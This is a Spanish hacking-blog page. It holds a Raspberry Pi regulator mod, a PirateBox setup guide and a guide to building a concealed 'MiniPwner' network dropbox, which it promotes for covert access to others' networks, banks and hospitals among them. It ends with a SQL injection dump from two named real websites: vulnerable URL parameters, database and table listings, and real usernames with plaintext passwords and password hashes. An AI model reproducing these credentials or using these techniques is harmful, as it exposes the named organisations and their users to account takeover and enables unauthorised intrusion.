Archivos de la categoría ‘–Hacking–’

Si bien es cierto que para una gran cantidad de aplicaciones alimentamos nuestra placa Raspberry Pi con un adaptador de pared, otros usos podrían requerir de una fuente de alimentación portátil a baterías, como por ejemplo: Construyendo Nuestro Propio Pi(rate)Box Desde Cero.

Lamentablemente el circuito de la fuente de alimentación de la placa Raspberry Pi utiliza un regulador de tensión lineal para la línea de alimentación principal de 3.3V. El regulador de tensión en cuestión es un SE8117T33 fabricado por Seaward Electronics Inc., el cual, si bien es de alto rendimiento, por sus características lineales desperdicia aproximadamente un 30% de energía la cual disipa en forma de calor. Este porcentaje puede parecer despreciable si la placa Raspberry Pi es alimentada utilizando un adaptador de pared, pero cuando se trata de baterías, este porcentaje no es para nada insignificante. Para incrementar la autonomía utilizando baterías, sustituiremos el regulador de tensión lineal por un regulador de tensión switching.

Sin más preámbulos procederemos a analizar las características eléctricas del regulador de tensión original de la placa Raspberry Pi encontradas en la hoja de datos provista por el fabricante.

Descargar SE8117T33 Datasheet

Características principales del regulador de voltaje SE8117T33:

  • Voltaje de Entrada: 9V (Máx.)
  • Voltaje de Salida: 3.3V
  • Corriente Máxima: 1A

Conociendo estos datos, buscaremos un módulo regulador switching de características iguales o superiores para alimentar correctamente nuestra placa. En el mercado existe una gran cantidad de módulos switching de diversos fabricantes que pueden satisfacer nuestros requerimientos, como por ejemplo, el módulo D24V6ALV de la Casa Pololu, que si bien provee una corriente de salida máxima de 600mA, es suficiente para nuestro propósito. En particular, no me fué posible encontrar dicho módulo dada la actual escasez de componentes electrónicos importados en mi país. Sin desistir de la búsqueda, conseguí mediante un importador local un módulo genérico de procedencia China, rotulado “DSN-MINI-360”, cuyas características eléctricas se detallan a continuación:

Características principales del módulo regulador switching DSN-MINI-360:

  • Voltaje de Entrada: 4.75V – 23V
  • Voltaje de Salida: 1.0V – 17V (Ajustable)
  • Corriente Máxima: 1.8A
  • Eficiencia: 96%

Como podemos observar, las características satisfacen perfectamente nuestros requerimientos, y con una eficiencia del 96% sólo tenemos una pérdida del 4% en contraste con el 30% del regulador de tensión lineal original, obteniendo así una mejora del 26%.

El módulo regulador switching DSN-MINI-360 se observa en las siguientes imágenes:

A continuación debemos soldar al módulo switching los 3 cables de conexión en los lugares correspondientes:

  • IN+ –> Entrada (+) [5V]
  • IN- –> GND (-) [Común a Entrada/Salida]
  • OUT+ –> Salida (+) [3.3V]

En la siguiente imagen se observa el resultado de este proceso:

Habiendo realizado exitosamente el paso anterior, ahora debemos ajustar la tensión de salida del módulo a un voltaje de 3.3V, la misma tensión de salida del regulador de voltaje original de la placa. Conectaremos el módulo switching a una fuente de alimentación cuyo voltaje de salida sea 5V, respetando el esquema de conexiones detallado anteriormente. Con el multímetro ajustado en la escala apropiada, comenzaremos a ajustar el trimpot ayudándonos con un destornillador de precisión hasta obtener el voltaje deseado en la salida. NO DEBE EXCEDER 3.3V!!!

IMPORTANTE: el ajuste de la tensión de salida del módulo switching debe realizarse ANTES de ser conectado a la placa Raspberry Pi. Una tensión de alimentación mayor a 3.3V causará daños irreparables en la placa.

Llegados a este punto, ya tenemos el módulo switching listo para ser instalado como reemplazo del regulador de voltaje original. La etapa siguiente probablemente sea las más crítica (y emocionante) de todo el proceso, que consiste en remover el regulador de voltaje original e instalar el módulo switching como reemplazo del mismo.

Antes de remover el regulador de voltaje SE8117T33, debemos verificar el pinout del mismo para identificar los puntos de conexión de nuestro módulo switching. El pinout se observa en la siguiente imagen:

Luego, buscamos el regulador de voltaje original en la placa Raspberry Pi y en su correspondiente diagrama esquemático para identificar correctamente los puntos de conexión:

Descargar Raspberry Pi Rev 2.1 Model A/B Schematics

Para remover el regulador de tensión original, emplearemos una estación de soldado SMD con aire caliente, en particular he utilizado la estación HONY 908 con excelentes resultados.

Con extremo cuidado calentaremos el componente hasta que sea posible extraerlo de la placa con la ayuda de una brusela antiestática. Debemos asegurarnos de calentar lo suficiente el componente ya que de lo contrario existe el riesgo de dañar los pads del PCB. La placa con el regulador de voltaje removido se observa a continuación:

Si logramos remover el regulador de tensión sin inconvenientes, podemos volver a respirar y la modificación estará casi completa. En caso de tener algún contratiempo, a no perder la calma y revisar el diagrama esquemático en busca de alguna solución.

Con el componente original removido, solamente nos queda soldar los 3 cables de conexión de nuestro módulo switching a los pads correspondientes en nuestra placa Raspberry Pi. También es conveniente fijar el módulo al PCB, para esta tarea utilizaremos un pegamento no abrasivo a base de silicona, por ejemplo “Fastix®”. El único inconveniente será que la frambuesa (logo) quedará oculta. Triste

En particular, he sometido a todo el proceso descripto anteriormente a dos placas Raspberry Pi con excelentes resultados. En las siguientes imágenes se observan ambas placas:

Anuncios

Vivimos días en los que el sitio “The Pirate Bay” ha sido bloqueado en diferentes países, incluido el nuestro. Vivimos días en los que partidos políticos y funcionarios quieren censurar hasta los comentarios en sitios web y redes sociales, ejerciendo una censura sin límites mediante justificaciones banales. Vivimos días en los que Google discrimina contenido proveniente de BitTorrent obligado por lobbies que nada tienen que ver con la ciudadanía ni la cultura. Así que para estos tiempos particularmente oscuros, tiempos de lucha en la red contra esas distintas formas de poder, quiero presentarles PirateBox: una caja para el que sabe que compartir no es robar.

El Pacto de San José de Costa Rica expresa:

Artículo 13. Libertad de Pensamiento y de Expresión
1. Toda persona tiene derecho a la libertad de pensamiento y de expresión. Este derecho comprende la libertad de buscar, recibir y difundir informaciones e ideas de toda índole, sin consideración de fronteras, ya sea oralmente, por escrito o en forma impresa o artística, o por cualquier otro procedimiento de su elección.

Declaración Universal de los Derechos Humanos:

Todo individuo tiene derecho a la libertad de opinión y expresión; este derecho incluye el de no ser molestado a causa de sus opiniones, el de investigar y de recibir informaciones y opiniones, y el de difundirlas, sin limitación de fronteras, por cualquier medio de expresión.

En tanto a Internet la OEA sostiene en su Declaración Conjunta sobre Libertad de Expresión e Internet:

1. Principios generales
La libertad de expresión se aplica a Internet del mismo modo que a todos los medios de comunicación. Las restricciones a la libertad de expresión en Internet solo resultan aceptables cuando cumplen con los estándares internacionales que disponen, entre otras cosas, que deberán estar previstas por la ley y perseguir una finalidad legítima reconocida por el derecho internacional y ser necesarias para alcanzar dicha finalidad (la prueba "tripartita").

Un PirateBox es un dispositivo electrónico portátil, que a menudo consiste en un enrutador y un dispositivo de almacenamiento, la creación de una red inalámbrica que permite a los usuarios que están conectados a la misma compartir archivos de forma anónima y de manera local. Por definición, este dispositivo no está conectado a Internet.

Inspirado por los movimientos en pro de la cultura libre y las radios pirata, el artista David Darts utiliza software libre y abierto (FLOSS) para crear redes inalámbricas de cajas pirata para el libre y anónimo intercambio de imágenes, vídeo, audio, y demás contenido. Luego de leer los párrafos anteriores, tal vez se pregunten cuáles son sus características, dónde se obtiene, o mejor aún, cómo hacer uno por su cuenta.

Lista de Componentes

1 Raspberry Pi Modelo B (Rev. 2)

1 Memoria USB Sandisk Cruzer Micro 16GB (o equivalente)

1 Tarjeta de Memoria ADATA microSDHC 8GB Clase 10 (o equivalente) [Sistema de Archivos FAT32, partición única]

1 Adaptador USB Inalámbrico TP-LINK TL-WN823N (o equivalente Realtek RTL8192CU)

1 Cargador Portátil a Batería USB 10.000mAh con suministro de corriente de 2A

1 Cable Ethernet (derecho) retráctil.

1 Adaptador de Tarjetas microSD de Bajo Perfil (opcional)

Instalación

Habiendo reunido todos los componentes, nuestro primer paso será descargar la siguiente imagen: Raspberry Pi(rate)Box 1.0.2 image v1.0.5 utilizando nuestro cliente BitTorrent favorito, en particular, recomiendo Deluge. Una vez finalizada la descarga recomiendo seguir compartiendo el archivo para colaborar con la descarga del mismo y así ayudar a otros miembros de la comunidad.

Luego descomprimiremos el archivo “ArchLinuxARM-2014.10-PirateBox*.zip” y como resultado de este proceso obtendremos el archivo “raw_arch_image_file”, el cual debemos escribir en nuestra tarjeta microSDHC.

Podemos realizar esta tarea desde un sistema operativo Linux con la utilidad “dd”. Desde un sistema operativo Windows podemos utilizar una excelente herramienta: Win32DiskImager

Luego de ejecutar la utilidad debemos especificar la ruta de la imagen a escribir y seleccionar la letra de la unidad correspondiente a nuestra tarjeta microSDHC. ¡CUIDADO! Finalmente presionamos el botón “Write”. La secuencia de pasos antes descritas se observa en la siguiente imagen:

Finalizado exitosamente el proceso de escritura de la imagen en la tarjeta microSDHC, procederemos a insertar la misma en el adaptador de bajo perfil y éste a su vez en el zócalo del Raspberry Pi. Además conectaremos la memoria USB, el adaptador USB inalámbrico y conectaremos el RPi a nuestro router utilizando el cable Ethernet. Finalmente conectaremos la fuente de alimentación.

Luego de algunos segundos, habiendo iniciando por completo el sistema operativo Arch Linux, ejecutaremos nuestro cliente SSH favorito y estableceremos una conexión a la dirección IP asignada por el servidor DHCP de nuestro router. Desde un sistema operativo Windows podemos utilizar una excelente herramienta: “PuTTY”, cuyo enlace de descarga se encuentra a continuación.

PuTTY 0.64

Autor: Jakub

Web: jakub.kotrla.net/putty/

Tamaño: 1.05MB

SHA1 Hash: B37FB75C18705263BB9A4A0DCCFCBCE395CB1A76

Descarga     Mirror

Cuando se nos solicite, introduciremos las credenciales de acceso

login: root

Password: root

Ejecutamos la siguiente secuencia de comandos:

[root@alarmpi ~]# passwd

A continuación introduciremos una nueva contraseña decente para el usuario “root”, como se observa en la siguiente imagen:

Ahora debemos configurar la memoria USB como almacenamiento predeterminado para nuestro PirateBox, para ello debemos ejecutar la siguiente secuencia de comandos:

[root@alarmpi ~]# echo "/dev/sda1 /mnt/usbdrive vfat umask=0,noatime,rw,user 0 0" >> /etc/fstab

[root@alarmpi ~]# mkdir -p /mnt/usbdrive

[root@alarmpi ~]# mount /mnt/usbdrive

[root@alarmpi ~]# mv /opt/piratebox/share/Shared /mnt/usbdrive

[root@alarmpi ~]# ln -s /mnt/usbdrive/Shared /opt/piratebox/share

[root@alarmpi ~]# mv /opt/piratebox/share/board/src /mnt/usbdrive/kareha_uploads

[root@alarmpi ~]# ln -s /mnt/usbdrive/kareha_uploads /opt/piratebox/share/board/src

La ejecución exitosa de la secuencia de comandos expuesta anteriormente se observa en la siguiente imagen:

Como vemos, la ejecución de determinados comandos arroja el mensaje de error “Failed to preserve ownership for…”, podemos ignorar este mensaje ya que se trata acerca de la preservación de permisos en los archivos, esto es lógico ya que estamos utilizando el sistema de archivos FAT32 en la memoria USB.

La siguiente tarea consiste en configurar como Access Point el adaptador USB inalámbrico para proveer conectividad a los usuarios. Afortunadamente ya se encuentran incluidas algunas versiones alternativas de “hostapd”, entre las cuales se encuentra una versión para el chipset de nuestro adaptador inalámbrico (RTL8192CU). Ahora debemos instalar la versión correcta de “hostapd” para nuestro chipset ejecutando el comando:

[root@alarmpi ~]# pacman -U /prebuild/hostapd/hostapd-8192cu-0.8_rtw_r7475.20130812_beta-3-armv6h.pkg.tar.xz

El resultado de la ejecución del comando anterior se observa en las siguientes imágenes:

Siendo exitoso el paso anterior, ahora debemos asegurarnos que el administrador de paquetes “pacman” no actualice la versión alternativa de “hostapd” que acabamos de instalar. Para esto debemos modificar el archivo “pacman.conf” ejecutando el siguiente comando:

[root@alarmpi ~]# nano /etc/pacman.conf

Luego, modificamos el archivo como se muestra en la siguiente imagen:

Con lo anterior nos aseguramos que “pacman” no reemplace nuestra versión alternativa de “hostapd”. Ahora sólo queda editar el archivo de configuración de “hostapd” para configurar el controlador correcto. Debemos modificar el archivo “hostapd.conf” utilizando el comando:

[root@alarmpi ~]# nano /opt/piratebox/conf/hostapd.conf

Y modificamos el archivo como se muestra en la siguiente imagen:

El controlador correcto es RTL871xdrv, en minúsculas. La L no es 1.

Finalmente procedemos a reiniciar el dispositivo:

[root@alarmpi ~]# shutdown –r now

Luego de reiniciar el dispositivo, nuevamente establecemos una conexión ejecutando nuestro cliente SSH favorito y ejecutamos los siguientes comandos:

[root@alarmpi ~]# systemctl start piratebox

[root@alarmpi ~]# systemctl enable piratebox

Llegados a este punto, cerramos la sesión SSH con el comando:

[root@alarmpi ~]# exit

Luego procederemos a desconectar el cable Ethernet de nuestro Raspberry Pi y nos conectaremos mediante Wi-Fi al Punto de Acceso inalámbrico cuyo SSID es “PirateBox – Share Freely”. Una vez más ejecutaremos nuestro cliente SSH favorito y estableceremos una conexión a la dirección IP 192.168.77.1.

Luego de introducir las credenciales de acceso, debemos modificar el archivo de configuración de “Kareha” (Pizarra de Imágenes y Discusión). Para realizar esta tarea, utilizaremos el editor de texto “vi”. Modificaremos los valores de las constantes “ADMIN_PASS” y “SECRET”. También debemos eliminar el caracter “#” al principio de ambas líneas en caso de estar presente.

ADMIN_PASS: contraseña decente.

SECRET: totalmente aleatorio y extenso. No es necesario recordarlo.

[root@alarmpi ~]# vi /opt/piratebox/www/board/config.pl

Habiendo modificado exitosamente el archivo de configuración, ejecutamos el siguiente comando:

[root@alarmpi ~]# /opt/piratebox/bin/timesave.sh /opt/piratebox/conf/piratebox.conf install

Ahora, ejecutaremos nuestro navegador web favorito y en la barra de direcciones introduciremos la dirección http://piratebox.lan/board/kareha.pl para la primera inicialización.

Finalmente procederemos a activar el servidor multimedia UPnP con la siguiente secuencia de comandos:

[root@alarmpi ~]# cp /etc/minidlna.conf /etc/minidlna.conf.bkp

[root@alarmpi ~]# cp /opt/piratebox/src/linux.example.minidlna.conf /etc/minidlna.conf

Editaremos el archivo “minidlna.conf” utilizando el editor de texto “vi”.

[root@alarmpi ~]# vi /etc/minidlna.conf

El archivo debe quedar como se muestra en la siguiente imagen:

Por último, iniciamos el servidor multimedia UPnP con la siguiente secuencia de comandos:

[root@alarmpi ~]# systemctl start minidlna

[root@alarmpi ~]# systemctl enable minidlna

Share freely!!!

Fuente: http://www.piratebox.cc/raspberry_pi:diy

Luego de más de un año de ausencia es un placer publicar nuevamente y compartir conocimiento con la comunidad. Retomando el hábito de maker y blogger, en esta ocasión construiremos una “Pentesting Dropbox” para llevar a cabo nuestros menesteres en redes ajenas. Estos dispositivos proporcionan acceso remoto a una red, y su principal ventaja es su reducido tamaño, por lo que pueden pasar desapercibidos sin ningún problema.

En este caso, MiniPwner, se trata de un router wireless TP-Link TL-MR3040 el cual posee un puerto Ethernet y el sistema operativo OpenWRT en el cual se han instalado herramientas específicas para tareas de pentesting, como: nmap, tcpdump, nbtscan, ettercap, kismet, aircrack-ng, etc. ofreciendo la posibilidad de establecer túneles VPN para ejecutar otras herramientas externamente pero manteniendo el acceso. Una vez conectado a una toma de red descuidada (o abandonada, algo muy común actualmente debido a la tecnología inalámbrica), podemos acceder mediante Wi-Fi desde una localización próxima y tranquilamente trabajar sobre la red a la que nos hemos conectado. Podríamos acceder a redes de bancos, hospitales, restaurantes, clínicas, etc. siempre y cuando las tomas de red encontradas proporcionen un enlace real. Con esta breve introducción y sin más preámbulos comenzaremos a construir nuestro MiniPwner.

Lista de Componentes

1 Router inalámbrico N portátil 3G/4G TP-Link MR3040 v2.x

1 Memoria USB Sandisk Cruzer Micro 16GB (o equivalente)

Particionando y Formateando la Memoria USB

En primer lugar debemos particionar y formatear nuestra memoria USB de la siguiente manera:

Partición 1: 500MB (Primaria – Linux Swap)

Partición 2: 6.96GB (Primaria – Ext4)

Podemos realizar esta tarea desde un sistema operativo Linux con utilidades como “fdisk” o “GParted”. Desde un sistema operativo Windows podemos utilizar una excelente herramienta: “MiniTool Partition Wizard Professional Edition 8.1.1” cuyo enlace de descarga se encuentra a continuación.

MiniTool Partition Wizard Professional Edition 8.1.1

Autor: MiniTool

Web: www.partitionwizard.com

Tamaño: 13.9MB

SHA1 Hash: D3DD0B6387736EB07EAC20526EA0660386CE4207

Descarga

En la siguiente imagen se observa nuestra memoria USB (en este caso, con una capacidad de 8GB) particionada y formateada de acuerdo a las especificaciones antes mencionadas:

Instalando OpenWRT

Habiendo realizado exitosamente la operación anterior, ahora estamos en condiciones de instalar OpenWRT en nuestro router. Para esto, debemos descargar el firmware desde uno de los enlaces que se encuentran a continuación:

OpenWRT Barrier Braker 14.07

Autor: OpenWRT

Web: openwrt.org

Tamaño: 3.75MB

SHA1 Hash: BE3DD2577242204FCB4A9A715AFD4F2F00762AD5

Descarga     Mirror

Utilizando un cable Ethernet (derecho, no cruzado) conectaremos el dispositivo a nuestro ordenador y ejecutaremos nuestro navegador web favorito. A continuación, en la barra de direcciones introduciremos la dirección IP 192.168.0.1 y pulsaremos Enter. Cuando se nos solicite, introduciremos el Nombre de Usuario y la Contraseña predeterminados, admin en ambos casos. Verificadas las credenciales de acceso, nos encontraremos en la interfaz web de configuración del router.

Para instalar el nuevo firmware descargado anteriormente procederemos de la siguiente manera, en el menú desplegable ubicado en la columna izquierda de la interfaz web seleccionamos “System Tools” –> “Firmware Upgrade”. Luego, presionamos el botón “Examinar” y especificamos la ruta del archivo de firmware descargado anteriormente, por ejemplo, D:Downloadsopenwrt-ar71xx-generic-tl-mr3040-v2-squashfs-factory.bin. Finalmente presionamos el botón “Upgrade”. En breve, el router se reiniciará y ya tendremos instalado el nuevo firmware. En la siguiente imagen se observa el proceso descripto anteriormente.

Configurando OpenWRT

Habiendo finalizado exitosamente la instalación del firmware, procederemos a realizar configuraciones y ajustes para posteriormente convertir nuestro router en MiniPwner. En primer lugar, ejecutaremos nuestro navegador web favorito y en la barra de direcciones introduciremos la dirección IP 192.168.1.1. La interfaz web presentada se observa en la siguiente imagen:

Seleccionamos “Go to password configuration” y se presentan las siguientes opciones de configuración:

Introducimos una contraseña decente y dejamos las demás opciones de configuración con sus valores por defecto. Finalmente seleccionamos “Save and Apply”, como se muestra a continuación:

En el paso anterior configuramos la contraseña y automáticamente habilitamos el servidor SSH, ahora debemos descargar e instalar algunos paquetes de software, para hacer esto nuestro router requiere de acceso a internet. Podemos obtener acceso de dos maneras, una es de manera inalámbrica, conectando nuestro router a un punto de acceso inalámbrico y la otra es utlizando un módem 3G. En esta publicación utilizaremos el primer método. En la barra de menú superior seleccionamos “Network” –> “Wifi”.

Luego seleccionamos “Scan”.

Y finalmente seleccionamos la red a la cual deseamos conectarnos introduciendo la contraseña correspondiente. (no importa si es red ajena)

Con la conexión configurada exitosamente, a continuación ejecutamos nuestro cliente SSH favorito y establecemos una conexión a la dirección IP 192.168.1.1. Desde un sistema operativo Windows podemos utilizar una excelente herramienta: “PuTTY”, cuyo enlace de descarga se encuentra a continuación.

PuTTY 0.64

Autor: Jakub

Web: jakub.kotrla.net/putty/

Tamaño: 1.05MB

SHA1 Hash: B37FB75C18705263BB9A4A0DCCFCBCE395CB1A76

Descarga     Mirror

Cuando se nos solicite, introduciremos las credenciales de acceso, las mismas utilizadas anteriormente en la interfaz web.

login: root

Password: (password)

Ejecutamos la siguiente secuencia de comandos:

root@OpenWrt:~# opkg update

root@OpenWrt:~# opkg install kmod-scsi-core kmod-usb-storage block-mount kmod-lib-crc16 kmod-crypto-hash kmod-fs-ext4

A continuación insertamos la memoria USB en el puerto USB del router y reiniciamos el dispositivo con el comando:

root@OpenWrt:~# reboot

Luego de reiniciar el dispositivo con la memoria USB insertada, nuevamente establecemos una conexión ejecutando nuestro cliente SSH favorito y editamos el archivo “fstab”, para esto ejecutamos el siguiente comando:

root@OpenWrt:~# vi /etc/config/fstab

El archivo debe modificarse acorde a la siguiente imagen:

Ejecutamos la siguiente secuencia de comandos:

root@OpenWrt:~# mkdir -p /tmp/cproot

root@OpenWrt:~# mount –bind / /tmp/cproot

root@OpenWrt:~# mkdir /mnt/sda2

root@OpenWrt:~# mount /dev/sda2 /mnt/sda2

root@OpenWrt:~# tar -C /tmp/cproot -cvf – . | tar -C /mnt/sda2 -xf –

root@OpenWrt:~# umount /tmp/cproot

Habiendo ejecutado sin errores la anterior secuencia de comandos, nuevamente modificamos el archivo “fstab” acorde a la siguiente imagen:

root@OpenWrt:~# vi /etc/config/fstab

A continuación reiniciamos una vez más nuestro dispositivo.

root@OpenWrt:~# reboot

Hello MiniPwner!

Ahora verificamos que la memoria USB se encuentre montada correctamente ejecutando el comando:

root@OpenWrt:~# df –h

En la siguiente imagen se observa el resultado de la ejecución del comando anterior.

Si todo es correcto, procedemos a ejecutar la siguiente secuencia de comandos:

root@OpenWrt:~# opkg update

root@OpenWrt:~# opkg install libpcap libstdcpp libpthread zlib libopenssl libbz2 bzip2 terminfo libnet1 libpcre libltdl libncurses librt libruby wireless-tools hostapd-common-old kmod-madwifi ruby uclibcxx libnl libcap libreadline libdnet libdaq libuuid libffi python-mini openssl-util kmod-tun liblzo libevent2-core libevent2-extra libevent2-openssl libevent2-pthreads libevent2 aircrack-ng elinks ettercap karma kismet-client kismet-drone kismet-server nbtscan netcat nmap openvpn-easy-rsa openvpn-openssl perl samba36-client samba36-server snort tar tcpdump tmux yafc wget python vim unzip

root@OpenWrt:~# cd /tmp

root@OpenWrt:/tmp# wget http://minipwner.com/images/Overlay/minipwner-overlay_x.x.x.tar

Luego, nos desconectamos de la sesión SSH y ejecutamos nuestro navegador web favorito, en la barra de direcciones accedemos a la interfaz web del router, dirección IP 192.168.1.1 e introducimos las credenciales de acceso configuradas anteriormente.

Debemos eliminar la conexión al punto de acceso inalámbrico creada anteriormente, para llevar a cabo esta tarea seguiremos paso a paso la siguiente secuencia de imágenes:

Ahora cerramos la interfaz web y nuevamente establecemos una conexión ejecutando nuestro cliente SSH favorito, ejecutamos la siguiente secuencia de comandos:

root@OpenWrt:~# cd /tmp

root@OpenWrt:/tmp# tar -xf minipwner-overlay_x.x.x.tar

root@OpenWrt:/tmp# sh setup.sh

Finalmente nos aseguramos que el “Selector de Modo de Operación” (switch de 3 posiciones) en el router se encuentre en la posición central (“WISP”) y a continuación reiniciamos el dispositivo. El resultado exitoso de la ejecución de los comandos anteriores se observa en la siguiente imagen.

Happy Pwning!!!

Acerca de los MiniModos

Una característica sobresaliente en esta versión de MiniPwner son los llamados “MiniModos”. Estos modos de operación se logran gracias al agregado de un switch selector de 3 posiciones situado en el lateral izquierdo del router (visto de frente). Una vez reiniciado el dispositivo, luego de completar el último paso, nos conectaremos al router mediante Wi-Fi, el SSID de la red es “MiniPwner-Setup” y la contraseña de acceso es “M!n!Pwn3r$etup” (sin comillas).

Luego ejecutaremos nuestro navegador web favorito y en la barra de direcciones introduciremos la dirección 192.168.3.1/cgi-bin/minimodes. También podríamos utilizar nuestro móvil ya que la interfaz es responsiva. Observamos lo siguiente:

La primera columna (empezando desde la izquierda) indica la posición del switch selector de modo de operación, la columna central especifica el modo configurado actualmente y la última columna permite reemplazar la configuración actual del switch selector por una nueva.

AP: Modo Access Point

Setup: Modo de configuración/mantenimiento.

WarWalk: Modo Warwalking (Yeah!)

Black Mod

Esta modificación es personal y queda a criterio del lector aplicarla o no según el caso. Nada de lo expuesto en este apartado afecta al funcionamiento normal del dispositivo en caso de no realizar las siguientes modificaciones.

En caso de necesitar ocultar el dispositivo con fines poco didácticos, el color blanco de la carcaza del router no colabora mucho con la palabra discreción precisamente. Sería de gran ayuda una apariencia más oscura para pasar desapercibido. Para lograr esto, podemos utilizar diversas técnicas, a criterio de quien escribe hay dos soluciones rápidas y sencillas: vinilo adhesivo muy delgado o vinilo en aerosol (“Plasti Dip”). Ante la imposibilidad de conseguir vinilo adhesivo ultra delgado, decidí optar por la segunda opción muy utilizada en auto/moto tunning.

Ya que vamos a aplicar “pintura” en aerosol, será necesario desarmar completamente el router. Resulta un poco complicado el desarme dada la falta de documentación con respecto a esta tarea. Afortunadamente no es nada que un par de cervezas no puedan solucionar.Taza Para llevar a cabo la tarea es prácticamente imprescindible el siguiente juego de herramientas:

Comenzaremos quitando la tapa de la batería y luego la batería. Luego quitamos los dos tornillos (PH000) que aseguran la carcaza. A continuación quitaremos las trabas de los cuatro extremos con la ayuda de la aleta plástica (o púa) y el lapicero de prueba metálico (o herramienta de apertura universal metálica). Luego con la ayuda de un destornillador plano debemos aflojar las cuatro trabas centrales que se ubican de a dos en los bordes laterales del compartimento de la batería.

Si sobrevivimos a esta tarea, y sin haber dañado la carcaza ni la placa, retiramos la placa del interior del gabinete quedando éste completamente vacío.

Luego debemos enmascarar con cinta de papel las partes del gabinete que no deseamos “vinilizar” con “Plasti Dip”. Para proteger la superficie utilizamos apuntes antiguos. Risa

Con la aplicación de una capa de “Plasti Dip” será suficiente para conseguir la apariencia tan deseada de nuestro MiniPwner.

Para incrementar aún más el nivel de discreción sería necesario apagar los LEDs del MiniPwner. Mediante software podemos controlar todos los LEDs excepto el de encendido, por esta razón también le aplicamos vinilo negro a esa parte de la tapa frontal para disminuir notablemente el brillo de dicho LED. También podríamos quitarlo directamente del PCB aprovechando que tenemos el dispositivo desarmado, aunque esta última idea no me resulta del todo convincente.

Con la siguiente secuencia de comandos es posible apagar todos los LEDs del router (excepto el LED de encendido).

root@OpenWrt:~# echo 0 > /sys/devices/platform/leds-gpio/leds/tp-link:green:3g/brightness

root@OpenWrt:~# echo 0 > /sys/devices/platform/leds-gpio/leds/tp-link:green:wlan/brightness

root@OpenWrt:~# echo 0 > /sys/devices/platform/leds-gpio/leds/tp-link:green:lan/brightness

Otra posible modificación sería el agregado de una antena externa, una excelente opción para pentesting, pero para actividades mas subrepticias no sería conveniente ya que dificultaría el ocultamiento del dispositivo.

También es posible exponer el puerto serie al exterior instalando un conector apropiado en la carcaza, como un cabezal hembra de 1×4.

El resultado final de aplicar “Black Mod” se observa en la siguiente imagen:

 

Fuente: http://minipwner.com/index.php/build-one

Análisis de Servidor AtlanSystem en Robtex
Robtex Analysis AtlanSystem

Parámetro Vulnerable:
http://www.tupacamaru.org.ar/nota.asp?wVarID=

Motor de Base de Datos:
Microsoft SQL Server 2000 - 8.00.2039

Bases de Datos (34):

[*] AACC
[*] adminsrv
[*] asarmec
[*] atlansystem_net_pagos
[*] atlansystem_net_sistema
[*] autosybarcos_com_sistema
[*] baroloadmin
[*] casadegalilea_org_ar_web
[*] chat
[*] edicionesive_org_ar_web
[*] estudiomartin_com_intraweb
[*] estudiomartin_com_intrawebbeta
[*] flor
[*] GainvestSite
[*] gestiontupac
[*] IVE
[*] iveglobal
[*] master
[*] MEC
[*] model
[*] msdb
[*] Northwind
[*] pbarolo
[*] prueba
[*] prueba2
[*] pubs
[*] restored
[*] sexyvip_com_ar_web
[*] sexyvip_com_mx_web
[*] tempdb
[*] tupacamaru_org_ar_sistema (web)
[*] tupacv2
[*] vamono_com_ar_sistema
[*] votacionive

Tablas de tupacamaru_org_ar_sistema (14):

+-----------------------+
| dbo.Galerias          |
| dbo.Imagenes          |
| dbo.Localidades       |
| dbo.News              |
| dbo.Noticias          |
| dbo.Provincias        |
| dbo.Secciones         |
| dbo.Usuarios          |
| dbo.UsuariosCategoria |
| dbo.contacto          |
| dbo.dtproperties      |
| dbo.newswel           |
| dbo.sysconstraints    |
| dbo.syssegments       |
+-----------------------+

Tabla UsuariosCategoria de tupacamaru_org_ar_sistema (3):

+----------------------+--------------------------+
| UsuariosCategoria_ID | UsuariosCategoria_Nombre |
+----------------------+--------------------------+
| 1                    | Super administrador      |
| 2                    | Administrador            |
| 3                    | General                  |
+----------------------+--------------------------+

Tabla Usuarios de tupacamaru_org_ar_sistema (2):

+-------------------+-------------+-----------------+---------------------+---------------+----------------------+
| Usuarios_Apellido | Usuarios_ID | Usuarios_Nombre | Usuarios_NombreReal | Usuarios_Pass | Usuarios_Permisos_ID |
+-------------------+-------------+-----------------+---------------------+---------------+----------------------+
| Silvana           | 31          | Silvana         | Silvana             | 131973        | 1                    |
| David             | 32          | David           | david               | tupac0102     | 1                    |
+-------------------+-------------+-----------------+---------------------+---------------+----------------------+

Parámetro Vulnerable:
http://www.sadaic.org.ar/index.php?area=home&recid=

Motor de Base de Datos:
MySQL 5.1.53

Usuarios de Motor de Base de Datos (7):

[*] ddalessio@10.30.110.20
[*] poweruser@10.30.110.20
[*] root@127.0.0.1
[*] root@linux-vymr
[*] root@localhost
[*] sadaicback2@%
[*] sadaicfront@10.30.110.20 (web)

Password Hashes de Usuarios de Motor de Base de Datos (5):

[*] ddalessio [1]:
    password hash: *D5C4B4AD0C052DBC030F6BC974B79162891A83A6
[*] poweruser [1]:
    password hash: *327244AACF89B6E777373A6B35B846137F616C39
[*] root [2]:
    password hash: *94FE6BA923AAEDEE4494C8C8C96E9273A1157474
    password hash: NULL
[*] sadaicback2 [1]:
    password hash: *CCF3E51A067240B3899703F850FD2CCFD786B19C
[*] sadaicfront [1]:
    password hash: *D07D9CA0A03A92B1AE384E764E56A84FD159F01E

Bases de Datos (2):

[*] www_sadaic (web)
[*] www_sadaic_reparto

Tablas de www_sadaic (36):

+-----------------------+
| `cargas-log`          |
| `log-ingreso`         |
| aa_areas              |
| aa_areas_items        |
| aa_loader             |
| aa_textos             |
| aa_textos_link        |
| areas                 |
| areas_sub             |
| calendario            |
| contactenos           |
| ctacorriente          |
| ctacorriente_rubros   |
| faq                   |
| farmacias             |
| farmacias_ubicaciones |
| filiales              |
| mutual                |
| mutual_categorias     |
| mutual_ubicaciones    |
| organismos            |
| quienes               |
| quienes_personas      |
| ranking               |
| ras                   |
| ras_anio              |
| rubros                |
| rubros_detalles       |
| sociedades            |
| socios                |
| strings               |
| textos                |
| textos_link           |
| usuarios              |
| usuarios_privilegios  |
| websocios             |
+-----------------------+

Tablas de www_sadaic_reparto (16):

+-------------------+
| _update           |
| cae               |
| cias              |
| fechas            |
| iswc              |
| marcas            |
| prod_inter        |
| prod_obra_int_nom |
| prod_obras        |
| productos         |
| repartos          |
| seudonimos        |
| sociedad          |
| soportes          |
| strings           |
| titulos           |
+-------------------+

Tabla usuarios de www_sadaic (8):

+------------+-------------------------------------------+--------------------------+-------+--------+---------------+
| activacion | clave                                     | email                    | recid | status | usuarioid     |
+------------+-------------------------------------------+--------------------------+-------+--------+---------------+
| 2007-06-01 | 1f3870be274f6c49b3e31a0c6728957f (apple)  | NULL                     | 39    | 0      | dd-carga      |
